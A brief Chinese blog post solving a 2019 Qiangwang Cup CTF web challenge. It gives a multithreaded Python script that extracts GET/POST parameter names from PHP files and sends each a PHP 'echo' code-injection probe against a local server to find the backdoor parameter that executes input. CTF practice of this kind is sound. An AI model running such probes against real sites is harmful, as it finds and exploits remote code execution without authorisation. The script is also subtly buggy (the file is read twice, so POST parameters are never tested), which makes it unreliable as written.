看了大佬博客,手动打一遍(相当于复制粘贴了),-_-||
大佬博客:
强网杯 2019-高明的黑客
强网杯 2019-高明的黑客(考察代码编写能力)
short-code
温馨提示:
当在本地测试的时候,php版本需要大于等于7.0
记录结果最好保存到一个文本文件中,因为直接在控制台很难找到!!!!
import os
import re
import requests
import threading
import time
print("开始时间:"+time.asctime(time.localtime(time.time())))
s1=threading.Semaphore(100) #设置最大线程数
filepath=r"C:/Users/Lenovo/Desktop/src/" #当前资源路径
os.chdir(filepath) #改变当前资源路径
files=os.listdir(filepath)
requests.adapters.DEFAULT_RETRIES=5 #设置重连次数,防止线程数过高,断开连接
session=requests.Session()
session.keep_alive=False
def get_content(file):
s1.acquire()
print("trying "+file+"in "+time.asctime(time.localtime(time.time())))
with open(file,encoding='utf-8') as f:
gets=list(re.findall('\$_GET\[\'(.*?)\'\]',f.read()))
posts=list(re.findall('\$_POST\[\'(.*?)\'\]',f.read()))
data={} #所有的POST
param={} #所有的GET
for m in gets:
param[m]="echo '123456';"
for n in posts:
data[n]="echo '123456';"
url="http://127.0.0.1/src/"+file
req=session.post(url,data=data,params=param)
req.close()
req.encoding='utf-8'
content=req.text
if "123456" in content:
flag=0
for a in gets:
req=session.get(url+"?%s="%a+"echo '123456';")
content=req.text
req.close()
if "123456" in content:
flag=1
break
if flag!=1:
for b in posts:
req=session.post(url,data={b:"echo '123456';"})
content=req.text
req.close()
if "123456" in content:
break
if flag==1:
param=a
else:
param=b
print("找到了利用文件:"+file+" 和利用参数:%s"%param)
local_file = open("flag.txt", "w", encoding="utf-8")
local_file.write(file+param)
print("结束时间: "+time.asctime(time.localtime(time.time())))
s1.release()
for i in files: #加入多线程
t=threading.Thread(target=get_content,args=(i,))
t.start()
写的简陋了点,因为懒。